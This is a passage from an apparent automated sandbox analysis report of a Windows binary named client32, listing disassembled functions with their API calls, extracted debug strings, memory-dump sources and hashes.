                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                                                • _memmove.LIBCMT ref: 110193F7
                                                                                                                                                                                • _memmove.LIBCMT ref: 1101941B
                                                                                                                                                                                • _memmove.LIBCMT ref: 11019455
                                                                                                                                                                                • _memmove.LIBCMT ref: 11019471
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 110194BB
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: deque<T> too long
                                                                                                                                                                                • API String ID: 827257264-309773918
                                                                                                                                                                                • Opcode ID: 4c0ca60d46d157fcc594ad629503b2dc6dc4640e44a65306b03993e9632fc4be
                                                                                                                                                                                • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 4c0ca60d46d157fcc594ad629503b2dc6dc4640e44a65306b03993e9632fc4be
                                                                                                                                                                                • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                                                                                                                Function 110D17A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110D17C0
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                                                • _memmove.LIBCMT ref: 110D1847
                                                                                                                                                                                • _memmove.LIBCMT ref: 110D186B
                                                                                                                                                                                • _memmove.LIBCMT ref: 110D18A5
                                                                                                                                                                                • _memmove.LIBCMT ref: 110D18C1
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 110D190B
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110D1920
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: deque<T> too long
                                                                                                                                                                                • API String ID: 827257264-309773918
                                                                                                                                                                                • Opcode ID: 1e0acdd55ecfe0d499bb7250297d6dfe697a5e27b0c044711328fd16226f5212
                                                                                                                                                                                • Instruction ID: 83474c0ad42d8d056a5333d5cbd31b10cc1d1820382d8d0bc69aa6afc8f1167c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e0acdd55ecfe0d499bb7250297d6dfe697a5e27b0c044711328fd16226f5212
                                                                                                                                                                                • Instruction Fuzzy Hash: F04187B6E00305ABDF04CEA8CC81AAEB7F9AF84214F19C669D819D7345EA75E905C790
                                                                                                                                                                                Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 111194FA
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 11119508
                                                                                                                                                                                • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                                                                                                                • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                                                                                                                                • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                                                                                                                                Strings
                                                                                                                                                                                • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                                                                                                                • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                                                                                                                • API String ID: 4172599486-2052393828
                                                                                                                                                                                • Opcode ID: 365eb484751d16e3a1658a5264be542e42b550692525f6160a53b662bb7281b1
                                                                                                                                                                                • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 365eb484751d16e3a1658a5264be542e42b550692525f6160a53b662bb7281b1
                                                                                                                                                                                • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                                                                                                                Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                                                                                                                  • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                                                                                                                  • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                                                                                                                                • wsprintfA.USER32 ref: 1100977F
                                                                                                                                                                                • wsprintfA.USER32 ref: 11009799
                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                                                                                                                • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                                                                                                                • API String ID: 559337438-1872371932
                                                                                                                                                                                • Opcode ID: 277b0ff1c62f5718654ec1042c280a76372f8976069ca2afd6d5263e0e9cd1d5
                                                                                                                                                                                • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                                                                                                                                • Opcode Fuzzy Hash: 277b0ff1c62f5718654ec1042c280a76372f8976069ca2afd6d5263e0e9cd1d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                                                                                                                                Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                                                                                                  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                                                                                                  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                                                                                                  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                                                                                                                • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                                                                                                                • String ID: 8
                                                                                                                                                                                • API String ID: 762489935-4194326291
                                                                                                                                                                                • Opcode ID: 36b6b7b6eb53d29a13b18da85147fbcf2dfe44dd241986b23efbe7a94cfa3718
                                                                                                                                                                                • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                                                                                                                • Opcode Fuzzy Hash: 36b6b7b6eb53d29a13b18da85147fbcf2dfe44dd241986b23efbe7a94cfa3718
                                                                                                                                                                                • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                                                                                                                Function 1103D2B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113filewindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                                                                                                                • SendMessageA.USER32(00000000,0000004A,00010446,?), ref: 1103D313
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                                                                                                                • String ID: CLTCONN.CPP$NSMW16Class
                                                                                                                                                                                • API String ID: 4104200039-3790257117
                                                                                                                                                                                • Opcode ID: 83d32708039d8c40cf37059a606cd330f3983d7d7e91d7edb73426f23a200077
                                                                                                                                                                                • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                                                                                                                • Opcode Fuzzy Hash: 83d32708039d8c40cf37059a606cd330f3983d7d7e91d7edb73426f23a200077
                                                                                                                                                                                • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                                                                                                                                Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,74DF0BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,11110200,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                                                                                                                • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                                                                                                                • API String ID: 2999768849-588814233
                                                                                                                                                                                • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                                                                                                                • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                                                                                                                • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                                                                                                                • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                                                                                                                Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                                                                                                                • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                                                                                                                • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                                                                                                                • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                                                                                                                • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$Sleep
                                                                                                                                                                                • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                                                                                                                • API String ID: 4250438611-314227603
                                                                                                                                                                                • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                                                                                                • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                                                                                                                • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                                                                                                • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                                                                                                                Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strncmp.LIBCMT ref: 1100953A
                                                                                                                                                                                • _strncmp.LIBCMT ref: 1100954A
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,2520CF5D), ref: 110095EB
                                                                                                                                                                                Strings
